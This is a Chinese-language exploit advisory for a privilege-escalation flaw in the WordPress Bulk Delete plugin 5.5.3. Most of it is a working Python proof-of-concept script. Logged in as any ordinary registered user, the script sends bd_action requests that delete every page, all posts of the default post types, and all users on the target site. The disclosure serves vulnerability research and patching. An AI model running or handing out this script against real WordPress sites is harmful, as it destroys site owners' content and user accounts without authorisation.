WordPress Bulk Delete Plugin 5.5.3 -权限提升
- 漏洞标题:WordPress的批量删除插件[特权升级]
- 发现日期:2016年2月10日
- 漏洞作者:Panagiotis Vagenas
- 软件链接:https://wordpress.org/plugins/bulk-delete/
- 版本:5.5.3
- 测试上:WordPress的4.4.2
- 类别:WebApps,WordPress
描述:
任何用户都可以通过_Bulk DELETE_提供的任务管理进行提升权限,但是不能操作所有部分分别支持如下部分
bd_delete_pages_by_status
:通过删除所有状态页面bd_delete_posts_by_post_type
:删除按类型的所有帖子bd_delete_users_by_meta
:删除所有特定用户的meta值
网站注册的任何用户都可以通过这个漏洞执行bd_action ,所以是一个权限提升漏洞
下面是漏洞测试POC:
#!/usr/bin/python3
################################################################################
# Bulk Delete Privilege Escalation Exploit
#
# **IMPORTANT** Don't use this in a production site, if vulnerable it will
# delete nearly all your sites content
#
# Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
################################################################################
import requests
loginUrl = 'http://example.com/wp-login.php'
adminUrl = 'http://example.com/wp-admin/index.php'
loginPostData = {
'log': 'username',
'pwd': 'password',
'rememberme': 'forever',
'wp-submit': 'Log+In'
}
l = requests.post(loginUrl, data=loginPostData)
if l.status_code != 200 or len(l.history) == 0 or
len(l.history[0].cookies) == 0:
print("Couldn't acquire a valid session")
exit(1)
loggedInCookies = l.history[0].cookies
def do_action(action, data):
try:
requests.post(
adminUrl + '?bd_action=' + action,
data=data,
cookies=loggedInCookies,
timeout=30
)
except TimeoutError:
print('Action ' + action + ' timed out')
else:
print('Action ' + action + ' performed')
print('Deleting all pages')
do_action(
'delete_pages_by_status',
{
'smbd_pages_force_delete': 'true',
'smbd_published_pages': 'published_pages',
'smbd_draft_pages': 'draft_pages',
'smbd_pending_pages': 'pending_pages',
'smbd_future_pages': 'future_pages',
'smbd_private_pages': 'private_pages',
}
)
print('Deleting all posts from all default post types')
do_action('delete_posts_by_post_type', {'smbd_types[]': [
'post',
'page',
'attachment',
'revision',
'nav_menu_item'
]})
print('Deleting all users')
do_action(
'delete_users_by_meta',
{
'smbd_u_meta_key': 'nickname',
'smbd_u_meta_compare': 'LIKE',
'smbd_u_meta_value': '',
}
)
exit(0)
代码具有攻击性,请遵守当地法律法规。